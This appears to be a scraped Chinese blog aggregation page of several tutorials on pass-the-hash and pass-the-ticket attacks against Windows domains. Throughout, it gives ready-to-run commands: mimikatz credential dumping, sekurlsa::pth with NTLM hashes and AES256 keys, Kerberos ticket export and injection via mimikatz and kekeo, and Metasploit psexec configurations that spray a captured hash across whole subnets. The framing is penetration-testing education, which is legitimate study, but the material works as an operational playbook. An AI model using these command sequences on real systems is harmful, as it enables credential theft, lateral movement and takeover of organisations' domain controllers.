精华内容
下载资源
问答
  • 哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
  • 哈希传递攻击

    2021-06-30 19:56:53
    哈希传递概念散列值 概念 哈希传递通过找到与账户相关的密码散列值(NTLM Hash)来攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,如果计算机的本地...

    概念

    哈希传递通过找到与账户相关的密码散列值(NTLM Hash)来攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,如果计算机的本地管理员账号和密码都是相同的,攻击者就能使用哈希传递方法登陆内网中的其他计算机。同时,通过哈希传递攻击,攻击者不需要花时间破解密码散列值。

    散列值在Windows中是用来证明身份的,攻击者往往会使用第三方工具来完成任务。在win2012之后的版本,默认内存中不会记录明文密码,因此攻击者往往会使用工具将散列值传递到其他计算机中,进行权限验证,实现对远程计算机的控制。

    散列值

    如果该网站使用明文的方式保存用户的密码,一旦该网站出现安全漏洞,所有用户的明文密码均会被泄露。当用户设置密码时,网站服务器会对用户输入的密码进行散列加密处理。散列加密算法一般为单向不可逆算法。当用户登录网站时,会先对用户输入的密码进行散列加密处理,再与数据库中存储的散列值进行对比,如果完全相同则表示验证成功。

    主流的Windows操作系统会使用NTLM Hash对访问资源的用户进行身份验证。早起版本的Windows操作系统,使用的是LM Hash对用户密码进行验证。当密码大于等于15位时,就无法使用LM Hash了。从win2008后就默认禁用了LM Hash了,因为在使用NTLM Hash进行身份认证时,不会使用明文口令,而是将明文口令通过系统API转换成散列值。攻击者在获得密码散列值后,依旧可以使用哈希传递攻击来模拟用户进行认证。

    使用NTLM Hash进行哈希传递

    实验环境: 远程系统

    • 域名:hacke.testlab
    • IP地址:192.168.108.104
    • 用户名:administrator
    • NTLM Hash:7e96950fe6fe7b0809390bf6b0eb1922

    首先我们现在域控机器上获取到administrator对应的ntlm值

    mimikatz "privilege::debug" "sekurlsa::logonpasswords"
    

    在这里插入图片描述

    在目标机器中,以管理员权限运行mimikatz

    mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:hacke.testlab /ntlm:7e96950fe6fe7b0809390bf6b0eb1922"
    

    在这里插入图片描述
    至此我们已经可以控制域控制器了
    在这里插入图片描述
    在这里插入图片描述

    展开全文
  • 1、哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式。 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Windows Server 2012 R2及...

    1、哈希传递

    哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式。

    通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Windows Server 2012 R2及之后版本的操作系统中,默认不会在内存中保存明文密码,Mimikatz 就读不到密码明文,因此此时往往会使用工具将哈希值传递到其他计算机中进行登录验证。

    NTLM Hash

    在目标主机上使用 mimikatz 获取 NTLM Hash

    privilege::debug
    sekurlsa::logonpasswords
    

    在远程主机上以管理员权限打开 mimikatz

    privilege::debug
    sekurlsa::pth /user:administrator /domain:teamssix.com /ntlm:161cff084477fe596a5db81874498a24
    

    mimikatz 执行后,会弹出一个拥有对应 Hash 用户权限的 CMD 窗口。

    AES-256 密钥

    使用 mimikatz 抓取密钥

    privilege::debug
    sekurlsa::ekeys
    

    在其他远程计算机中,以管理员权限打开 mimikatz

    privilege::debug
    sekurlsa::pth /user:administrator /domain:teamssix.com /aes256:7358fb65149672d99b8c9f3dfd0dfeb486b78268e9c5250b23aefbd26f293c60
    

    这里需要目标机器上安装 KB2871997 补丁,补丁下载地址:https://www.microsoft.com/en-us/download/details.aspx?id=42722

    将该补丁安装后,就可以通过 AES256 密钥进行哈希传递了。

    除了 AES256 外还有 AES128 等,不过平时基本都是使用 NTLM 哈希进行传递。

    2、票据传递

    票据传递(Pass The Ticket, PTT)是基于Kerberos认证的一种攻击方式,这里主要学习票据传递在 mimikatz 和 kekeo 两个工具里的使用。

    mimikatz

    使用 mimikatz 可以将内存中的票据进行导出。

    privilege::debug
    sekurlsa::tickets /export
    

    执行该命令后,会在当前目录下生成多个服务的票据文件,例如 kirbi 等

    使用以下命令可以清除内存中的票据

    kerberos::purge
    

    将票据文件注入内存

    kerberos::ptt "[0;4beae]-2-0-40e00000-Administrator@krbtgt-TEAMSSIX.COM.kirbi"
    

    在当前终端下退出 mimikatz ,然后就可以列出目标目录了。

    票据传递除了用 mimikatz 还可以用 kekeo

    kekeo

    kekeo 需要使用域名、用户名、NTLM HASH 生成票据,然后再将票据导入,从而连接远程计算机。

    tgt::ask /user:administrator /domain:teamssix.com /ntlm:161cff084477fe596a5db81874498a24
    

    在 kekeo 中清除当前内存中的其他票据,不然可能会导致票据传递失败

    kerberos::purge
    

    在 Windows 命令行中也可以执行系统自带的命令进行内存中的票据清除

    klist purge
    

    使用以下命令将票据导入内存,之后 exit 退出 kekeo,使用 dir 命令就可以列出远程文件了。

    kerberos::ptt "TGT_administrator@TEAMSSIX.COM_krbtgt~teamssix.com@TEAMSSIX.COM.kirbi"
    

    注意点:

    1、票据文件注入内存的默认有效时间为 10 小时

    2、在目标机器上不需要本地管理员权限就可以进行票据传递

    3、使用票据传递时,dir 命令必须使用主机名,如果使用 IP 地址会提示拒绝访问。

    参考文章:

    https://www.cnblogs.com/Xy–1/p/13216686.html

    原文链接:

    https://teamssix.com/210901-160349.html
    更多信息欢迎关注我的微信公众号:TeamsSix

    展开全文
  • 哈希传递攻击(Pass-the-Hash)

    千次阅读 2021-04-12 22:40:42
    MSF进行哈希传递攻击 一. 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的...

    目录

    一. 哈希传递攻击

    MSF进行哈希传递攻击


    一. 哈希传递攻击

    接上一篇我们获取到了哈希值并对哈希值进行破解 Pass-the-Hash攻击,但是破解不出来咋办?哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。

    哈希传递攻击适用情况:

    在工作组环境中:

    • Windows Vista之前的机器,可以使用本地管理员组内用户进行攻击。
    • Windows Vista之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

    在域环境中:

    • 只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。

    MSF进行哈希传递攻击

    有些时候,当我们获取到了某台主机的administrator 用户的密码哈希值,并且该主机的445端口打开着。我们则可以利用exploitlwindows/smb/psexec模块用MSF进行远程登录(哈希传递攻击),这个利用跟工作组环境或者域环境无关,即在工作组环境中也是可以利用的。这个是rhost可以是一个主机,也可以设置一个网段。

    这里目标主机的WindowsVista之后的机器,所以只能使用administrator用户进行攻击。

    1. win7实验

    (1)使用administrator用户进行攻击

    加入了域环境

    使用的本地administrator进行登录

    提权到system获取到了hash值:

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

    哈希传递攻击如下

    use  exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.4
    set rhost 192.168.1.7
    set smbuser Administrator
    set smbpass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942   #这里LM和NTLM我们已经获取到了
    exploit 

    攻击结果如下,成功进行了登录

    此时可以进行哈希传递,如本地与win7同网段的还有一个win2012机器,由于方便管理win2012的账号密码和win7是一样的,所以我们利用哈希传递尝试进行登录win2012。

    将目标机器换成win2012的ip

    set rhosts 192.168.1.6

    如下,成功登录win2012,这就是哈希传递攻击

    如果是在真实环境中,我们可以将rhosts换成一个ip地址段,如下

    set rhosts 192.168.1.0-192.168.1.10
    或者
    set rhosts 192.168.1.0/24

    程序在一个个尝试进行登录,如下是登录成功的

    (2)使用本地普通用户进行攻击

    使用本地普通用户哈希传递攻击是不行的。

    持续更新....

    展开全文
  • 哈希传递攻击(Pass-the-Hash,PtH)

    千次阅读 2020-01-11 22:52:11
    哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997...
    展开全文
  • 该项目是一个C#工具,用于在用户命名模拟的本地命名管道上使用哈希传递进行身份验证。 有一个博客文章进行解释:SharpNamedPipePTH此项目是一个C#工具,用于在本地命名管道上使用哈希传递进行身份验证,以进行用户...
  • Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash值的情况下能成功;②哈希传递会受到...
  • 哈希传递攻击(Pass-the-Hash)

    千次阅读 2019-12-25 22:42:26
    目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享...
  • 内网渗透哈希传递攻击

    千次阅读 2019-12-18 11:58:23
    条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和...
  • 使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用...
  • 哈希传递(PTH)攻击利用 环境:kali &win8 privilege::debug sekurlsa::logonpasswords win8中运行: 网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃 sekurlsa::pth /user:administrator ...
  • 创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞 漏洞描述 基于注册表单的二阶基于盲布尔的sql注入,如果为true,则会导致users_logs,所有日志都将显示,否则为空 哈希中的管理员用户名和密码无法破解,因此很...
  • 在这种情况下,称为Pass The Hash(传递哈希)或Hash Injection(哈希注入)的技术被广泛应用,使审核员成为计算机上的管理员。 2. NTLM协议与身份验证 NTLM协议是在Microsoft环境中使用的一种身份验证协议,特别是...
  • hashpass-android hashpass 实现与 Stephan Boyer 的 Chrome 插件 ( ) 完全兼容。
  • 『主要内容』主要介绍在后***测试阶段如何对Windows操作系统进行哈希传递***(Hash-Pass-Attack)。-------------------------------------------菜鸟起飞系列-------------------------------------...
  • kali密码攻击之——哈希传递攻击

    千次阅读 2017-04-22 20:10:51
    passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在...
  • 域渗透 1....sekurlsa::logonpasswords//猕猴桃抓取密码 仅仅是这样,我们是无法做到访问域控的,这个时候我们就需要用到哈希传递 在猕猴桃内: sekurlsa::pth /user:administrator /domain:"zkaq....
  • 使用hash传递模块(passing the hash) msf5 > use exploit / windows / smb / psexec msf5 exploit ( windows / smb / psexec ) > options set rhost 192.168 .179 .132 set SMBUser ou set SMBPass aad...
  • 目录 文章目录 目录 NTLM 网络认证 认证流程 哈希传递攻击 NTLM 网络认证 认证流程 第一步:客户端向服务器发送用户信息(用户名等)。 第二步:服务端收到请求,在本地查找到用户对应的NTLM Hash,生成16位随机数...
  • 大约三年前,我写了一篇名为"传递哈希已死: 长久的哈希传递方法介绍"的文章,详细阐述了微软 KB2871997补丁的一些操作含义。 在安全建议中有一句特别的话,"这个功能的改变包括: 防止网络登录和使用本地帐户远程交互...
  • 如何使用哈希传递数据

    千次阅读 2009-01-20 10:59:00
    定义哈希表,并且参加相应的参数 Dim values As New Hashtable() Dim y As Double Dim x As Double values.Add("x", x) values.Add("y", y) FunctionA(values) 接收哈希表传来的数据,并且使用他的数据 ...
  • 目录0x001 相关知识0x002 域横向移动PTH NTML传递0x003 域横向移动PTK aes256传递0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&本地0x005 开源内网神器Ladon 0x001 相关知识 1)PTH(pass the hash) ...
  • 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序...
  • 哈希 哈希集(hash_set) 哈希集是与普通集合不同的是,他能完成时间复杂度为O(1)的查找和插入。 它通过哈希函数建立键值(key)与桶号的一一对应关系,当你插入数据时,通过哈希函数计算出桶号并找到相应的桶,如果桶...
  • wyhash:传递了SMHasher,BigCrush和practrand的梦想快速哈希函数和随机数生成器
  • 哈希

    千次阅读 2016-12-07 17:26:42
    哈希函数每次接受一个键将返回与键相对应的哈希编码或哈希值。键的数据类型可能多种多样,但哈希值的类型只能是整型。 由于计算哈希值和在数组中进行索引都只消耗固定的时间,因此哈希表的最大亮点在于它是
  • 哈希算法

    2019-10-26 10:05:04
    哈希函数的运算结果就是哈希值,通常简称为哈希哈希函数有时候也翻译做散列函数。 根据维基百科的定义,哈希函数要做的事情是给一个任意大小的数据生成出一个固定长度的数据,作为它的映射。所谓映射就是...
  • 哈希什么意思Hashing is an important topic for programmers and computer science students to be familiar with. This article is specifically targeted to students, and programmers with a few months to a ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 115,802
精华内容 46,320
关键字:

哈希传递